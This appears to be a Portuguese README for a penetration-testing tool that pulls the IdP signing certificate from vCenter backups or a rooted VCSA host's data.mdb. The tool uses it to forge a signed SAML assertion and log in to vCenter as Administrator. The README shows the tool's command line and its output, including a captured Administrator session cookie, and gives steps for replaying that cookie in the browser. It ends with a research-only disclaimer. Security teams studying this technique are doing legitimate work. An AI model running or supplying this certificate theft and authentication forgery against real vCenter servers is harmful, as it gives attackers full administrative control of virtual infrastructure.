
Uma ferramenta para extrair o certificado IdP de backups do vCenter e fazer login como Administrador
Uma ferramenta para extrair o certificado do Provedor de Identidade (IdP) de backups do vCenter e fazer login como Administrador
Comumente, durante engajamentos, obtemos acesso aos backups do vCenter em um servidor de arquivos ou acesso root ao host VCSA por meio de CVEs recentes. Fazer login na interface vSphere do vCenter nos permite acessar facilmente mais sistemas e informações confidenciais, além de mostrar aos clientes o impacto dessas descobertas.
O arquivo data.mdb contém os certificados e pode ser encontrado tanto nos backups do vCenter quanto no host VCSA com permissões de root. Esses certificados são armazenados em texto claro e podem ser usados para assinar qualquer solicitação de autenticação SAML para qualquer usuário — incluindo o Administrador integrado.
Se você quiser saber mais sobre vários casos de uso desta ferramenta e como a usamos para obter acesso administrativo a hosts vCenter, confira nosso post no blog: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
Com o cookie acima, visite a instância VCSA em https://<VCSA>/ui, adicione o cookie no caminho /ui e navegue novamente para https://<VCSA>/ui.

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis nem se responsabilizam pelo uso indevido do software. Use com responsabilidade.